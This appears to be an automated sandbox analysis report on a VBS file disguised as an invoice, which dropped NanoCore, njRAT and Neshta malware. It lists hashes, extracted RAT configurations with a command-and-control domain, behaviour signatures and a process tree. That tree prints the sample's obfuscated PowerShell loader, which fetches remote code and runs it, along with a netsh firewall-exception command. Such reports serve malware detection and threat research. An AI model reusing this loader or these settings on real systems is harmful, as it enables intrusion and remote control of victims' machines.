Analysis
-
max time kernel
4265099s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
14-01-2022 16:27
General
-
Target
Y1K3875FX_INV0ICE_RECEIPT.vbs
-
Size
4KB
-
MD5
eabf87aa6e88a700b48fdc11fd56d034
-
SHA1
02aa868a130881a5dc409a7d06d943f7ae7f0654
-
SHA256
a52cb2c09e66deb221d1db56e62b67138e5e3de516966481f789cd48dcacbe66
-
SHA512
46042d15120eccc2e645a11495715f1804b2923105b698e8fcacf6111a36a3b29aa30e5416c47db83ee4d49bd80a9b7b28751a5b591d4223c01f08b9cc86493a
Score
10/10
Malware Config
Extracted
Family
nanocore
Version
1.2.2.0
C2
childhome4100.duckdns.org:4100
Mutex
915339bc-81e8-473d-98ef-3cba5bb4ebc8
Attributes
-
activate_away_mode
true
-
backup_connection_host
childhome4100.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-10-26T14:02:15.903896736Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
4100
-
default_group
father of child
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
915339bc-81e8-473d-98ef-3cba5bb4ebc8
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
childhome4100.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Extracted
Family
njrat
Version
1.9
Botnet
HacKed
Mutex
Microsoft.Exe
Attributes
-
reg_key
Microsoft.Exe
Signatures
-
Detect Neshta Payload 3 IoCs
-
Modifies system executable filetype association 2 TTPs 1 IoCs
-
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
-
Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Blocklisted process makes network request 2 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of WriteProcessMemory 38 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Y1K3875FX_INV0ICE_RECEIPT.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/vet/PS1NAIO.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE4⤵
-
C:\Windows\system32\MusNotification.exeC:\Windows\system32\MusNotification.exe1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\PROGRA~3\314694~1\MICROS~1.EXEMD5
fda8c8f2a4e100afb14c13dfcbcab2d2
SHA119dfd86294c4a525ba21c6af77681b2a9bbecb55
SHA25699a2c778c9a6486639d0aff1a7d2d494c2b0dc4c7913ebcb7bfea50a2f1d0b09
SHA51294f0ace37cae77be9935cf4fc8aaa94691343d3b38de5e16c663b902c220bff513cd02256c7af2d815a23dd30439582ddbb0880009c76bbf36ff8fbc1a6ddc18
-
memory/536-136-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-132-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-133-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-134-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-135-0x0000023AB5870000-0x0000023AB5892000-memory.dmpFilesize
136KB
-
memory/536-147-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-137-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-138-0x0000023AB3F00000-0x0000023AB3F02000-memory.dmpFilesize
8KB
-
memory/536-139-0x0000023AB3F03000-0x0000023AB3F05000-memory.dmpFilesize
8KB
-
memory/536-140-0x0000023AB3F06000-0x0000023AB3F08000-memory.dmpFilesize
8KB
-
memory/536-131-0x0000023AB3E30000-0x0000023AB3E32000-memory.dmpFilesize
8KB
-
memory/536-130-0x0000000000000000-mapping.dmp
-
memory/3248-161-0x0000000000000000-mapping.dmp
-
memory/3304-163-0x0000000005680000-0x0000000005C24000-memory.dmpFilesize
5.6MB
-
memory/3304-146-0x000000000040BBCE-mapping.dmp
-
memory/3304-145-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3304-164-0x00000000061E0000-0x0000000006246000-memory.dmpFilesize
408KB
-
memory/3304-154-0x00000000055E0000-0x000000000567C000-memory.dmpFilesize
624KB
-
memory/3304-158-0x0000000005680000-0x0000000005712000-memory.dmpFilesize
584KB
-
memory/3304-150-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3304-165-0x0000000005C20000-0x0000000005C2A000-memory.dmpFilesize
40KB
-
memory/3304-152-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/3304-155-0x0000000005C30000-0x00000000061D4000-memory.dmpFilesize
5.6MB
-
memory/3812-157-0x00000000056B0000-0x000000000574C000-memory.dmpFilesize
624KB
-
memory/3812-153-0x0000000005B20000-0x00000000060C4000-memory.dmpFilesize
5.6MB
-
memory/3812-156-0x0000000005610000-0x00000000056A2000-memory.dmpFilesize
584KB
-
memory/3812-151-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3812-149-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3812-159-0x0000000005570000-0x0000000005B14000-memory.dmpFilesize
5.6MB
-
memory/3812-160-0x00000000055D0000-0x00000000055DA000-memory.dmpFilesize
40KB
-
memory/3812-162-0x0000000006EC0000-0x0000000006F26000-memory.dmpFilesize
408KB
-
memory/3812-142-0x000000000041E792-mapping.dmp
-
memory/3812-141-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/3864-148-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/3864-143-0x0000000000400000-0x000000000041B000-memory.dmpFilesize
108KB
-
memory/3864-144-0x00000000004080E4-mapping.dmp